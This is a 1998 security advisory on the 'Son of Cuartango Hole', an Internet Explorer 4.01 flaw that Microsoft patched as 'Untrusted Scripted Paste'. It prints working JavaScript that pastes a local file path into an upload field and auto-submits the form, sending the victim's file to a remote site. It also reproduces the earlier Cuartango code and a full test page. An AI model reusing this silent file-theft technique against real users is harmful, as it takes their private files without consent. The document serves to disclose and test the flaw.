The Son of Cuartango Hole
http://pages.whowhere.com/computers/cuartangojc/son1.html

Affected software

Microsoft Internet Explorer 4.01

Fixes

Microsoft has released a fix: Microsoft Security Site, http://www.microsoft.com/security/bulletins/ms98-015.asp
Microsoft names the vulnerability "Untrusted Scripted Paste". They have created a new USP patch.

Technical description

There is an input form field used to transfer files from the browsing computer to a web site. This input field is HTML coded as:

    <input type="file" name="filename" size="30">

Theoretically this input field can be filled only by the user, by clicking a "Browse" button or typing the file name. In order to avoid a security hole, scripts are not allowed to modify the value of this input field, so the statement below will not work:

    document.forms[0].filename.value = "C:\\config.sys";

The Cuartango Hole revealed that a single scripted "copy and paste" operation could write a file name into the input field; Microsoft's old USP patch fixed this single "copy and paste" vulnerability.

There is a workaround that makes the "paste" operation work again. The idea is to create a "textrange" object from the selection of the file input and then paste over this "textrange" object. The code below is a bit more sophisticated than the "Cuartango Hole" code. T1 is a hidden input field, defined in a second form, that contains the file pathname to be copied to the clipboard.

    <body onload="getfile()">

    function getfile() {
        document.forms[1].T1.select();          // select the hidden field holding the path
        document.execCommand("copy");           // copy it to the clipboard
        document.forms[0].filename.select();    // select the file input
        var rng = document.selection.createRange();
        rng.execCommand("paste");               // paste over the TextRange, not the document
        document.forms[0].submit();             // submit the form, uploading the file
    }

The result is that the file is POSTed to the malicious web site defined in the form's action property. Similar code will also work inside an HTML-formatted e-mail.
The Cuartango Hole code was very similar:

    function getfile() {
        document.forms[1].T1.select();
        document.execCommand("copy");
        document.forms[0].filename.select();
        document.execCommand("paste");          // document-level paste; blocked by the old USP patch
        document.forms[0].submit();
    }

Example Exploit

    <html>
    <head>
    <meta name="keywords" content="son of cuartango hole,cuartango hole,cuartango hack,cuartango,security,security site,USP,USP patch,security web,hack,security,risk,hole,security hole,explorer">
    <title>Son of Cuartango Hole Test</title>
    <bgsound src="images/gallarda.mid" loop="-1">
    </head>
    <body onload="getfile()">
    <script language="JavaScript">
    function getfile() {
        document.forms[0].filename.select();    // onload="getfile()"
        var rng = document.selection.createRange();
        document.forms[1].T1.select();
        document.execCommand("copy");
        rng.execCommand("paste");
        if (document.forms[0].filename.value == "")
            alert("Your browser does not have the security hole");
        else
            alert("Security hole in browser -- " + navigator.userAgent);
    }
    </script>
    <p align="center"><big><font color="#FF0000"><big><big>The Son of Cuartango Hole Test</big></big></font></big></p>
    <p align="center"> </p>
    <small>
    <form enctype="multipart/form-data" method="post" action="http://www.angelfire.com/cgi-bin/bedit">
    <div align="center"><center><p><strong>This is a test to verify if you are affected by the Son of Cuartango Hole</strong>.<br>
    <strong>If the file name (/test.txt) is made visible in the box below then you are affected.</strong></p>
    </center></div>
    <div align="center"><center><p>
    <input type="file" name="filename" size="15"></p>
    </center></div>
    </form>
    <form method="POST">
    <input type="hidden" name="T1" value="/test.txt"><p> </p>
    </form>
    </small>
    <p align="center"><font size="3" color="#0000FF"><a href="http://pages.whowhere.com/computers/cuartangojc/son1.html"><strong>Back to Son Of Cuartango Hole page</strong></a></font></p>
    <p align="center"><a href="mailto:cuartangojc@mx3.redestb.es">Juan Carlos García Cuartango</a></p>
    <p align="center"><font face="Arial"><img src="/cgi-bin/Count.cgi" width="97" height="24"><small><br></small></font></p>
    <p><font size="2" face="Garamond">Last update 1998 Nov 15, Year of Our Lord 1998</font></p>
    </body>
    </html>